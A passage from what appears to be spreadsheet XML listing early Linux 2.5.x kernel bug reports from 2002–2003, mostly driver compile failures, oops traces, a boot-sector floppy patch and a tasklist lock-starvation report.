    <t>2003-01-11 08:02 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.51 Hardware Environment: SB16 ISA Steps to reproduce: make mrproper make xconfig make dep make bzImage make -f scripts/Makefile.build obj=sound/synth/emux ld -m elf_i386 -r -o sound/synth/built-in.o sound/synth/emux/built-in.o ld: cannot open sound/synth/emux/built-in.o: No such file or directory make[2]: *** [sound/synth/built-in.o] Error 1 make[1]: *** [sound/synth] Error 2 make: *** [sound] Error 2</t>
  </si>
  <si>
    <t>depmod should be in README</t>
  </si>
  <si>
    <t>2002-12-10 12:50 UTC</t>
  </si>
  <si>
    <t>2003-02-21 04:54 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.51 Problem Description: The command `depmod -ae 2.5.xx' should be mentioned in the README now that `make modules_install' no longer does it automaticly.</t>
  </si>
  <si>
    <t>compile failure on drivers/media/video/bttv-cards.c</t>
  </si>
  <si>
    <t>2002-12-11 10:48 UTC</t>
  </si>
  <si>
    <t>2003-01-09 15:29 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.51 Distribution: Gentoo 1.4rc1 Hardware Environment: Abit KG7-RAID, AMD tbird, 512MB, Geforce3 Software Environment: gcc 3.2.1, glibc 2.3.1 Problem Description: Compiling bttv into the kernel breaks. I think this is slightly different from #93 in that #93 is compiling as module. It appears patche attached for bug #93 has been merged but only fixes compile as module. gcc -Wp,-MD,drivers/media/video/.bttv-cards.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigra phs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=i686 -Iarch/i386/mach-gener ic -nostdinc -iwithprefix include -DKBUILD_BASENAME=bttv_cards -DKBUILD_MODNAME=bttv -c -o drivers/media/ video/bttv-cards.o drivers/media/video/bttv-cards.c drivers/media/video/bttv-cards.c: In function `miro_pinnacle_gpio': drivers/media/video/bttv-cards.c:1742: `AUDC_CONFIG_PINNACLE' undeclared (first use in this function) drivers/media/video/bttv-cards.c:1742: (Each undeclared identifier is reported only once drivers/media/video/bttv-cards.c:1742: for each function it appears in.) make[3]: *** [drivers/media/video/bttv-cards.o] Error 1 make[2]: *** [drivers/media/video] Error 2 make[1]: *** [drivers/media] Error 2 make: *** [drivers] Error 2 Steps to reproduce: CONFIG_VIDEO_DEV=y CONFIG_VIDEO_BT848=y</t>
  </si>
  <si>
    <t>Impossible to setup MTRR registers</t>
  </si>
  <si>
    <t>2002-12-11 13:22 UTC</t>
  </si>
  <si>
    <t>Paulo Andre'</t>
  </si>
  <si>
    <t>2003-01-25 14:51 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.51 Distribution: Slackware 8.1 Hardware Environment: Pentium III 500MHz, 128MB RAM Software Environment: glibc-2.2.5, gcc-2.95.3 Problem Description: It seems to be impossible to setup the MTRR registers. Whenever I try to set them up via /proc/mtrr, it fails whatever the type I assign to it saying the type is illegal. This doesn't happen on 2.4 though. Steps to reproduce: # echo "base=0xd8000000 size=0x2000000 type=write-combining" &gt;| /proc/mtrr ubik kernel: mtrr: illegal type: "write-combining" # echo "base=0xd8000000 size=0x2000000 type=write-back" &gt;| /proc/mtrr ubik kernel: mtrr: illegal type: "write-back"</t>
  </si>
  <si>
    <t>Kernel crashes after stop network and remove e100.</t>
  </si>
  <si>
    <t>2002-12-11 19:14 UTC</t>
  </si>
  <si>
    <t>Kevin</t>
  </si>
  <si>
    <t>2003-02-20 18:54 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version:Linux-2.5.51 Distribution:Redhat 8.0+Linux2.5.51 Hardware Environment:Intel STL2 mother boar d Problem Description: Compile e100 as kernel module, insmod e100 and start the network. then stop network and remove e100 TOGETHER. then kernel crashes in random places. For example: Use command : insmod e100 /etc/init.d/network start /etc/init.d/network stop; rmmod e100 Then the kernel crashes. EFLAGS: 00010887 EIP is at cascade+0x25/0x60 eax: defd02b8 ebx: 00000001 ecx: 00000000 edx: c150a4c0 esi: c150acd4 edi: c150acd4 ebp: c150acd4 esp: c0559f1c ds: 0068 es: 0068 ss: 0068 Process swapper (pid: 0, threadinfo=c0558000 task=c0497f60) Stack: 00000000 c0559f94 00000001 c150a4c0 fffffffd 00000000 c012abb2 c150a4c0 c150acd4 c010baf5 00000000 00000000 c0559f94 00000001 c0553d68 fffffffd 00000000 c0125bb5 c150a4c0 00000046 00000000 00000000 c0559f94 c01070c0 Call Trace: [&lt;c012abb2&gt;] __run_timers+0x1b2/0x202 [&lt;c010baf5&gt;] handle_IRQ_event+0x45/0x70 [&lt;c0125bb5&gt;] do_softirq+0xc5/0xd0 [&lt;c01070c0&gt;] default_idle+0x0/0x50 [&lt;c0116f3d&gt;] smp_apic_timer_interrupt+0xcd/0x130 [&lt;c01070c0&gt;] default_idle+0x0/0x50 [&lt;c010a3a6&gt;] apic_timer_interrupt+0x1a/0x20 [&lt;c01070c0&gt;] default_idle+0x0/0x50 [&lt;c01070c0&gt;] default_idle+0x0/0x50 [&lt;c01070ea&gt;] default_idle+0x2a/0x50 [&lt;c010718a&gt;] cpu_idle+0x3a/0x50 [&lt;c0105000&gt;] rest_init+0x0/0x30 Code: 0f 0b 6f 01 ba a7 41 c0 8b 18 89 44 24 04 89 3c 24 e8 a5 0c</t>
  </si>
  <si>
    <t>e100 spits out strange message during startup.</t>
  </si>
  <si>
    <t>2002-12-12 08:46 UTC</t>
  </si>
  <si>
    <t>2003-05-27 17:10 UTC</t>
  </si>
  <si>
    <t>Scott Feldman</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.51 Hardware Environment: 02:08.0 Ethernet controller: Intel Corp. 82801BA/BAM/CA/CAM Ethernet Controller (rev 03) Problem Description: During bootup, the following gets printed - Intel(R) PRO/100 Network Driver - version 2.1.24-k2 Copyright (c) 2002 Intel Corporation e100: selftest OK. Freeing alive device cfdab000, eth%d e100: eth0: Intel(R) PRO/100 VE Network Connection Mem:0xfeafc000 IRQ:20 Speed:0 Mbps Dx:N/A Hardware receive checksums enabled The Freeing alive device message looks odd, and seems to get printed during unregistration of a device, which is an odd thing to have happen during init. Whats going on here ? Note also the eth%d, and Speed.</t>
  </si>
  <si>
    <t>compile failure on drivers/media/video/saa7185.c</t>
  </si>
  <si>
    <t>2002-12-12 09:13 UTC</t>
  </si>
  <si>
    <t>2003-02-11 08:38 UTC</t>
  </si>
  <si>
    <t>Frank Davis</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.51 Distribution: Gentoo 1.4rc1 Hardware Environment: Abit KG7-RAID, AMD tbird 1.4ghz. 512MB, Geforce3 Software Environment: linux-2.4.20, gcc 3.2.1, glibc 2.3.1 (2.3.1-r2) Problem Description: gcc -Wp,-MD,drivers/media/video/.saa7185.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=i686 -Iarch/i386/mach-generic -nostdinc -iwithprefix include -DKBUILD_BASENAME=saa7185 -DKBUILD_MODNAME=saa7185 -c -o drivers/media/video/saa7185.o drivers/media/video/saa7185.c drivers/media/video/saa7185.c: In function `saa7185_attach': drivers/media/video/saa7185.c:191: invalid type argument of `unary *' drivers/media/video/saa7185.c:191: incompatible types in assignment drivers/media/video/saa7185.c:192: invalid operands to binary == drivers/media/video/saa7185.c:196: invalid type argument of `unary *' drivers/media/video/saa7185.c:196: invalid type argument of `unary *' drivers/media/video/saa7185.c:196: incompatible type for argument 1 of `__constant_memcpy' drivers/media/video/saa7185.c:196: invalid type argument of `unary *' drivers/media/video/saa7185.c:196: incompatible type for argument 1 of `__memcpy' drivers/media/video/saa7185.c:197: `decoder' undeclared (first use in this function) drivers/media/video/saa7185.c:197: (Each undeclared identifier is reported only once drivers/media/video/saa7185.c:197: for each function it appears in.) drivers/media/video/saa7185.c:199: incompatible type for argument 1 of `kfree' drivers/media/video/saa7185.c:205: invalid type argument of `-&gt;' drivers/media/video/saa7185.c:206: incompatible types in assignment drivers/media/video/saa7185.c:207: invalid type argument of `-&gt;' drivers/media/video/saa7185.c:212: incompatible type for argument 1 of `i2c_master_send' drivers/media/video/saa7185.c:215: incompatible type for argument 1 of `i2c_master_send' drivers/media/video/saa7185.c:218: invalid type argument of `-&gt;' drivers/media/video/saa7185.c:222: invalid type argument of `-&gt;' drivers/media/video/saa7185.c:222: incompatible type for argument 1 of `i2c_smbus_read_byte' drivers/media/video/saa7185.c:225: incompatible type for argument 1 of `i2c_attach_client' make[3]: *** [drivers/media/video/saa7185.o] Error 1 make[2]: *** [drivers/media/video] Error 2 make[1]: *** [drivers/media] Error 2 make: *** [drivers] Error 2 Steps to reproduce: Multimedia devices ---&gt; Video For Linux ---&gt; &lt;*&gt; Zoran ZR36057/36060 Video For Linux &lt;*&gt; Iomega Buz support CONFIG_VIDEO_ZORAN=y CONFIG_VIDEO_ZORAN_BUZ=y</t>
  </si>
  <si>
    <t>compile failure on drivers/media/video/bt819.c</t>
  </si>
  <si>
    <t>2002-12-12 09:30 UTC</t>
  </si>
  <si>
    <t>2003-02-11 08:37 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.51 Distribution: Gentoo 1.4rc1 Hardware Environment: Abit KG7-RAID, AMD tbird 1.4ghz. 512MB, Geforce3 Software Environment: linux-2.4.20, gcc 3.2.1, glibc 2.3.1 (2.3.1-r2) Problem Description: gcc -Wp,-MD,drivers/media/video/.bt819.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=i686 -Iarch/i386/mach-generic -nostdinc -iwithprefix include -DKBUILD_BASENAME=bt819 -DKBUILD_MODNAME=bt819 -c -o drivers/media/video/bt819.o drivers/media/video/bt819.c drivers/media/video/bt819.c:62: warning: initialization from incompatible pointer type drivers/media/video/bt819.c: In function `bt819_probe': drivers/media/video/bt819.c:105: `bt819_attach' undeclared (first use in this function) drivers/media/video/bt819.c:105: (Each undeclared identifier is reported only once drivers/media/video/bt819.c:105: for each function it appears in.) drivers/media/video/bt819.c: At top level: drivers/media/video/bt819.c:168: `bt819_attach' used prior to declaration drivers/media/video/bt819.c:168: warning: `bt819_attach' defined but not used make[3]: *** [drivers/media/video/bt819.o] Error 1 make[2]: *** [drivers/media/video] Error 2 make[1]: *** [drivers/media] Error 2 make: *** [drivers] Error 2 Steps to reproduce: Multimedia devices ---&gt; Video For Linux ---&gt; &lt;*&gt; Zoran ZR36057/36060 Video For Linux &lt;*&gt; Linux Media Labs LML33 support CONFIG_VIDEO_ZORAN=y CONFIG_VIDEO_ZORAN_LML33=y</t>
  </si>
  <si>
    <t>ext3</t>
  </si>
  <si>
    <t>2.5.51 at kb driver leaves kb ib state that prevents (soft) reboot</t>
  </si>
  <si>
    <t>2002-12-13 13:58 UTC</t>
  </si>
  <si>
    <t>James Cloos</t>
  </si>
  <si>
    <t>2003-02-12 10:05 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: bk tag v2.5.51 Hardware Environment: dell i8100 notebook Problem Description: after soft reboot, bios reports kb failure; must power off and back on to continue. Steps to reproduce: boot into 2.5.51; shutdown -r</t>
  </si>
  <si>
    <t>tdfxfb.c can't be compiled</t>
  </si>
  <si>
    <t>2002-12-13 15:37 UTC</t>
  </si>
  <si>
    <t>Guenther Thomsen</t>
  </si>
  <si>
    <t>2003-02-21 04:47 UTC</t>
  </si>
  <si>
    <t>boris</t>
  </si>
  <si>
    <t>Simon</t>
  </si>
  <si>
    <t>boot from 21 sec/track floppy</t>
  </si>
  <si>
    <t>2002-12-16 02:02 UTC</t>
  </si>
  <si>
    <t>Peter Kovář</t>
  </si>
  <si>
    <t>2003-02-27 22:51 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.51, but applies to any kernel version Distribution: doesn't matter Hardware Environment: IA-32 aka i386 and higher Software Environment: Problem Description: inability to boot from floppy with higher capacity format Steps to reproduce: create boot floppy with 82 tracks, 21 sec/track format, formatted with /dev/fd0u1722 More than half year ago when I was testing XFS for a first time there was a problem with boot from floppy. Compressed kernel image compiled with XFS did not fit there. So I've tried to format it with higher capacity, however kernel was unable to boot. After couple of tries it became clear: missing entry 21 in the disksizes array. Following (single byte = probably the smallest one) patch applies to arch/i386/boot/bootsect.S as well as arch/x86_64/boot/bootsect.S (couple of lines off) PS: Happy New Linux 2.6 Year! _______________________________________________________________ --- bootsect.S.orig 2002-12-15 19:51:06.000000000 +0100 +++ bootsect.S 2002-12-15 19:52:08.000000000 +0100 @@ -405,7 +405,7 @@ ret sectors: .word 0 -disksizes: .byte 36, 18, 15, 9 +disksizes: .byte 36, 21, 18, 15, 9 msg1: .byte 13, 10 .ascii "Loading"</t>
  </si>
  <si>
    <t>Broken agpgart on i815 (maybe other ICH too)</t>
  </si>
  <si>
    <t>2002-12-16 12:15 UTC</t>
  </si>
  <si>
    <t>Paul P Komkoff Jr</t>
  </si>
  <si>
    <t>2003-01-10 16:31 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.51 Hardware Environment: Intel 815 chipset Problem Description: AGPGART broken, period</t>
  </si>
  <si>
    <t>mwave init yields: bad: scheduling while atomic!</t>
  </si>
  <si>
    <t>2002-12-20 11:54 UTC</t>
  </si>
  <si>
    <t>Jochen Hein</t>
  </si>
  <si>
    <t>2004-12-02 07:46 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.52 Distribution: Debian/testing Hardware Environment: IBM Thinkpad 600 Problem Description: Initializing the mwave driver (loading the userspace daemon) yields: Dec 20 20:46:51 gswi1164 kernel: &lt;3&gt;bad: scheduling while atomic! Dec 20 20:46:51 gswi1164 kernel: Call Trace: Dec 20 20:46:51 gswi1164 kernel: [schedule+61/712] schedule+0x3d/0x2c8 Dec 20 20:46:51 gswi1164 kernel: [interruptible_sleep_on+91/132] interruptible_sleep_on+0x5b/0x84 Dec 20 20:46:51 gswi1164 kernel: [&lt;c6b0ec5c&gt;] +0x9c/0x220 [mwave] Dec 20 20:46:51 gswi1164 kernel: [default_wake_function+0/52] default_wake_function+0x0/0x34 Dec 20 20:46:51 gswi1164 kernel: [&lt;c6b0ec7c&gt;] +0xbc/0x220 [mwave] Dec 20 20:46:51 gswi1164 kernel: [&lt;c6b0ec7c&gt;] +0xbc/0x220 [mwave] Dec 20 20:46:51 gswi1164 kernel: [&lt;c6b08515&gt;] mwave_ioctl+0x49d/0x5c8 [mwave] Dec 20 20:46:51 gswi1164 kernel: [schedule+616/712] schedule+0x268/0x2c8 Dec 20 20:46:51 gswi1164 kernel: [need_resched+31/42] need_resched+0x1f/0x2a Dec 20 20:46:51 gswi1164 kernel: [sys_ioctl+543/624] sys_ioctl+0x21f/0x270 Dec 20 20:46:51 gswi1164 kernel: [error_code+45/56] error_code+0x2d/0x38 Dec 20 20:46:51 gswi1164 kernel: [syscall_call+7/11] syscall_call+0x7/0xb Dec 20 20:46:51 gswi1164 kernel: Dec 20 20:46:51 gswi1164 kernel: bad: scheduling while atomic! Dec 20 20:46:51 gswi1164 kernel: Call Trace: Dec 20 20:46:51 gswi1164 kernel: [schedule+61/712] schedule+0x3d/0x2c8 Dec 20 20:46:51 gswi1164 kernel: [interruptible_sleep_on+91/132] interruptible_sleep_on+0x5b/0x84 Dec 20 20:46:51 gswi1164 kernel: [&lt;c6b0ec5c&gt;] +0x9c/0x220 [mwave] Dec 20 20:46:51 gswi1164 kernel: [default_wake_function+0/52] default_wake_function+0x0/0x34 Dec 20 20:46:51 gswi1164 kernel: [&lt;c6b0ec7c&gt;] +0xbc/0x220 [mwave] Dec 20 20:46:51 gswi1164 kernel: [&lt;c6b0ec7c&gt;] +0xbc/0x220 [mwave] Dec 20 20:46:51 gswi1164 kernel: [&lt;c6b08515&gt;] mwave_ioctl+0x49d/0x5c8 [mwave] Dec 20 20:46:51 gswi1164 kernel: [sys_kill+70/80] sys_kill+0x46/0x50 Dec 20 20:46:51 gswi1164 kernel: [do_timer+77/212] do_timer+0x4d/0xd4 Dec 20 20:46:51 gswi1164 kernel: [timer_interrupt+35/276] timer_interrupt+0x23/0x114 Dec 20 20:46:51 gswi1164 kernel: [do_softirq+81/176] do_softirq+0x51/0xb0 Dec 20 20:46:51 gswi1164 kernel: [sys_ioctl+543/624] sys_ioctl+0x21f/0x270 Dec 20 20:46:51 gswi1164 kernel: [syscall_call+7/11] syscall_call+0x7/0xb Dec 20 20:46:51 gswi1164 kernel: Dec 20 20:46:51 gswi1164 kernel: bad: scheduling while atomic! Dec 20 20:46:51 gswi1164 kernel: Call Trace: Dec 20 20:46:51 gswi1164 kernel: [schedule+61/712] schedule+0x3d/0x2c8 Dec 20 20:46:51 gswi1164 kernel: [interruptible_sleep_on+91/132] interruptible_sleep_on+0x5b/0x84 Dec 20 20:46:51 gswi1164 kernel: [&lt;c6b0ec5c&gt;] +0x9c/0x220 [mwave] Dec 20 20:46:51 gswi1164 kernel: [default_wake_function+0/52] default_wake_function+0x0/0x34 Dec 20 20:46:51 gswi1164 kernel: [&lt;c6b0ec7c&gt;] +0xbc/0x220 [mwave] Dec 20 20:46:51 gswi1164 kernel: [&lt;c6b0ec7c&gt;] +0xbc/0x220 [mwave] Dec 20 20:46:51 gswi1164 kernel: [&lt;c6b08515&gt;] mwave_ioctl+0x49d/0x5c8 [mwave] Dec 20 20:46:51 gswi1164 kernel: [sys_kill+70/80] sys_kill+0x46/0x50 Dec 20 20:46:51 gswi1164 kernel: [do_timer+77/212] do_timer+0x4d/0xd4 Dec 20 20:46:51 gswi1164 kernel: [timer_interrupt+35/276] timer_interrupt+0x23/0x114 Dec 20 20:46:51 gswi1164 kernel: [do_softirq+81/176] do_softirq+0x51/0xb0 Dec 20 20:46:51 gswi1164 kernel: [sys_ioctl+543/624] sys_ioctl+0x21f/0x270 Dec 20 20:46:51 gswi1164 kernel: [syscall_call+7/11] syscall_call+0x7/0xb Steps to reproduce: Just running the init script /etc/init.d/mwavem start I have not tried using the modem yet.</t>
  </si>
  <si>
    <t>kernel not honoring init= bootparm</t>
  </si>
  <si>
    <t>2002-12-20 12:45 UTC</t>
  </si>
  <si>
    <t>2003-01-10 16:30 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.52 Distribution: Debian Test Hardware Environment: single x86 CPU Software Environment: Problem Description: It appears that after a change in 2.5.52 to init/main.c by (I think) Rusty Russell, the kernel no longer pays attention to init=whatever when booting. Steps to reproduce: LILO 22.3.3 boot: 2.5.52-bk2 init=/bin/bas Loading 2.5.52-bk2....................... &lt;snip&gt; Kernel command line: BOOT_IMAGE=2.5.52-bk2 root=302 console=ttyS0,9600 console=tty0 init=/bin/bash but init still loads.</t>
  </si>
  <si>
    <t>Need more clear documentation for bug tracking processes</t>
  </si>
  <si>
    <t>2002-12-20 12:54 UTC</t>
  </si>
  <si>
    <t>Hanna Linder</t>
  </si>
  <si>
    <t>2003-01-14 14:30 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.X Distribution: ANY Hardware Environment: Software Environment: Problem Description: Steps to reproduce:</t>
  </si>
  <si>
    <t>proc_pid_readdir() holds the tasklist_lock for excessive periods of time</t>
  </si>
  <si>
    <t>2002-12-20 14:01 UTC</t>
  </si>
  <si>
    <t>2003-06-17 15:37 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.52; actually reproducible in 2.4.x and some pre-2.4.x Distribution: Debian; not distribution-specific Hardware Environment: 32x/32G NUMA-Q Software Environment: /bin/sh Problem Description: proc_pid_readdir()/get_pid_list() trip the NMI oopser Steps to reproduce: run top while 16-64K tasks are running and try to fork() Steps to fix: proc_pid_readdir() is quadratic because it has to buffer pids acquired from the tasklist, and then the cost of seeking back to its prior position is O(position), so the integral as position goes from 0 -&gt; tasks gives the usual (1/2) * tasks * (tasks + 1) iterations divided by buffer size or something. At any rate, this is unacceptable behavior as it causes deadly tasklist lock starvation that crashes machines with deadlock detection enabled, and it's triggerable by unprivileged users. The fix is to use a balanced tree-based list representation of the tasklist that maintains "rank" fields, which represent the position within an in-order traversal of the subtree rooted at a given node. Within triply- linked trees this allows efficient nonrecursive in-order traversal with O(lg(processes)) random access based on position within the list. Due to constructibility constraints wrt. systems with sufficient multiprogramming capacities, the hold times in a single buffer fill are bounded by something like buffersize + 32 after this.</t>
  </si>
  <si>
    <t>Jeff Sipek</t>
  </si>
  <si>
    <t>compilation fails drivers/net/defxx.c</t>
  </si>
  <si>
    <t>2002-12-23 17:13 UTC</t>
  </si>
  <si>
    <t>Johann Henriquez</t>
  </si>
  <si>
    <t>2003-09-19 08:40 UTC</t>
  </si>
  <si>
    <t>compile failure on drivers/media/video/zr36067.c</t>
  </si>
  <si>
    <t>2002-12-24 05:40 UTC</t>
  </si>
  <si>
    <t>2003-09-17 15:16 UTC</t>
  </si>
  <si>
    <t>compile failure on drivers/media/video/stradis.c</t>
  </si>
  <si>
    <t>2002-12-24 05:44 UTC</t>
  </si>
  <si>
    <t>2003-02-21 04:53 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.53 Distribution: Gentoo 1.4rc1 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.1, glibc 2.3.1, ld 2.13.90.0.16 Problem Description: gcc -Wp,-MD,drivers/media/video/.stradis.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-numaq -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=stradis -DKBUILD_MODNAME=stradis -c -o drivers/media/video/stradis.o drivers/media/video/stradis.c drivers/media/video/stradis.c: In function `saa_open': drivers/media/video/stradis.c:1952: structure has no member named `busy' drivers/media/video/stradis.c: In function `saa_close': drivers/media/video/stradis.c:1964: structure has no member named `busy' drivers/media/video/stradis.c: At top level: drivers/media/video/stradis.c:1977: unknown field `open' specified in initializer drivers/media/video/stradis.c:1977: warning: initialization makes integer from pointer without a cast drivers/media/video/stradis.c:1978: unknown field `close' specified in initializer drivers/media/video/stradis.c:1978: warning: initialization from incompatible pointer type drivers/media/video/stradis.c:1979: unknown field `read' specified in initializer drivers/media/video/stradis.c:1980: unknown field `write' specified in initializer drivers/media/video/stradis.c:1980: warning: initialization makes integer from pointer without a cast drivers/media/video/stradis.c:1981: unknown field `ioctl' specified in initializer drivers/media/video/stradis.c:1981: warning: missing braces around initializer drivers/media/video/stradis.c:1981: warning: (near initialization for `saa_template.lock') drivers/media/video/stradis.c:1981: warning: initialization makes integer from pointer without a cast drivers/media/video/stradis.c:1982: unknown field `mmap' specified in initializer drivers/media/video/stradis.c:1982: warning: initialization from incompatible pointer type drivers/media/video/stradis.c:245: warning: `detach_inform' defined but not used make[3]: *** [drivers/media/video/stradis.o] Error 1 make[2]: *** [drivers/media/video] Error 2 make[1]: *** [drivers/media] Error 2 make: *** [drivers] Error 2 Steps to reproduce: Multimedia devices ---&gt; Video For Linux ---&gt; &lt;*&gt; Stradis 4:2:2 MPEG-2 video driver (EXPERIMENTAL) CONFIG_VIDEO_STRADIS=y</t>
  </si>
  <si>
    <t>compile failure on drivers/media/video/tda9887.o</t>
  </si>
  <si>
    <t>2002-12-24 05:46 UTC</t>
  </si>
  <si>
    <t>2003-01-14 00:17 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.53 Distribution: Gentoo 1.4rc1 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.1, glibc 2.3.1, ld 2.13.90.0.16 Problem Description: gcc -Wp,-MD,drivers/media/video/.tuner.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-numaq -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=tuner -DKBUILD_MODNAME=tuner -c -o drivers/media/video/tuner.o drivers/media/video/tuner.c make[3]: *** No rule to make target `drivers/media/video/tda9887.o', needed by `drivers/media/video/built-in.o'. Stop. make[2]: *** [drivers/media/video] Error 2 make[1]: *** [drivers/media] Error 2 make: *** [drivers] Error 2 Steps to reproduce: Multimedia devices ---&gt; Video For Linux ---&gt; &lt;*&gt; Philips SAA7134 support CONFIG_VIDEO_SAA7134=y</t>
  </si>
  <si>
    <t>compile failure on drivers/mtd/devices/blkmtd.c</t>
  </si>
  <si>
    <t>Flash/Memory Technology Devices</t>
  </si>
  <si>
    <t>2002-12-24 05:52 UTC</t>
  </si>
  <si>
    <t>2003-09-15 08:58 UTC</t>
  </si>
  <si>
    <t>Adrian Bunk</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.53 Distribution: Gentoo 1.4rc1 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.1, glibc 2.3.1, ld 2.13.90.0.16 Problem Description: gcc -Wp,-MD,drivers/mtd/devices/.blkmtd.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-numaq -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=blkmtd -DKBUILD_MODNAME=blkmtd -c -o drivers/mtd/devices/blkmtd.o drivers/mtd/devices/blkmtd.c drivers/mtd/devices/blkmtd.c:52:25: linux/iobuf.h: No such file or directory drivers/mtd/devices/blkmtd.c: In function `blkmtd_readpage': drivers/mtd/devices/blkmtd.c:218: warning: implicit declaration of function `alloc_kiovec' drivers/mtd/devices/blkmtd.c:235: dereferencing pointer to incomplete type drivers/mtd/devices/blkmtd.c:238: dereferencing pointer to incomplete type drivers/mtd/devices/blkmtd.c:239: dereferencing pointer to incomplete type drivers/mtd/devices/blkmtd.c:240: dereferencing pointer to incomplete type drivers/mtd/devices/blkmtd.c:241: dereferencing pointer to incomplete type drivers/mtd/devices/blkmtd.c:242: dereferencing pointer to incomplete type drivers/mtd/devices/blkmtd.c:264: warning: implicit declaration of function `brw_kiovec' drivers/mtd/devices/blkmtd.c:266: dereferencing pointer to incomplete type drivers/mtd/devices/blkmtd.c:267: warning: implicit declaration of function `free_kiovec' drivers/mtd/devices/blkmtd.c: In function `write_queue_task': drivers/mtd/devices/blkmtd.c:327: dereferencing pointer to incomplete type drivers/mtd/devices/blkmtd.c:355: `KIO_MAX_SECTORS' undeclared (first use in this function) drivers/mtd/devices/blkmtd.c:355: (Each undeclared identifier is reported only once drivers/mtd/devices/blkmtd.c:355: for each function it appears in.) drivers/mtd/devices/blkmtd.c:373: dereferencing pointer to incomplete type drivers/mtd/devices/blkmtd.c:374: dereferencing pointer to incomplete type drivers/mtd/devices/blkmtd.c:386: dereferencing pointer to incomplete type drivers/mtd/devices/blkmtd.c:388: dereferencing pointer to incomplete type drivers/mtd/devices/blkmtd.c:396: dereferencing pointer to incomplete type drivers/mtd/devices/blkmtd.c:397: dereferencing pointer to incomplete type drivers/mtd/devices/blkmtd.c:411: dereferencing pointer to incomplete type make[3]: *** [drivers/mtd/devices/blkmtd.o] Error 1 make[2]: *** [drivers/mtd/devices] Error 2 make[1]: *** [drivers/mtd] Error 2 make: *** [drivers] Error 2 Steps to reproduce: Memory Technology Devices (MTD) ---&gt; Self-contained MTD device drivers ---&gt; &lt;*&gt; MTD emulation using block device CONFIG_MTD_BLKMTD=y</t>
  </si>
  <si>
    <t>compile failure on drivers/mtd/ftl.c</t>
  </si>
  <si>
    <t>2002-12-24 05:54 UTC</t>
  </si>
  <si>
    <t>2003-02-11 09:26 UTC</t>
  </si>
  <si>
    <t>David Woodhouse</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.53 Distribution: Gentoo 1.4rc1 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.1, glibc 2.3.1, ld 2.13.90.0.16 Problem Description: gcc -Wp,-MD,drivers/mtd/.ftl.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-numaq -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=ftl -DKBUILD_MODNAME=ftl -c -o drivers/mtd/ftl.o drivers/mtd/ftl.c drivers/mtd/ftl.c: In function `ftl_open': drivers/mtd/ftl.c:844: structure has no member named `b_disk' drivers/mtd/ftl.c: In function `ftl_close': drivers/mtd/ftl.c:858: structure has no member named `b_disk' make[2]: *** [drivers/mtd/ftl.o] Error 1 make[1]: *** [drivers/mtd] Error 2 make: *** [drivers] Error 2 Steps to reproduce: Memory Technology Devices (MTD) ---&gt; &lt;*&gt; FTL (Flash Translation Layer) support CONFIG_FTL=y</t>
  </si>
  <si>
    <t>SCSI Drivers</t>
  </si>
  <si>
    <t>compile failure on drivers/net/irda/vlsi_ir.c</t>
  </si>
  <si>
    <t>2002-12-24 06:02 UTC</t>
  </si>
  <si>
    <t>2003-01-09 14:58 UTC</t>
  </si>
  <si>
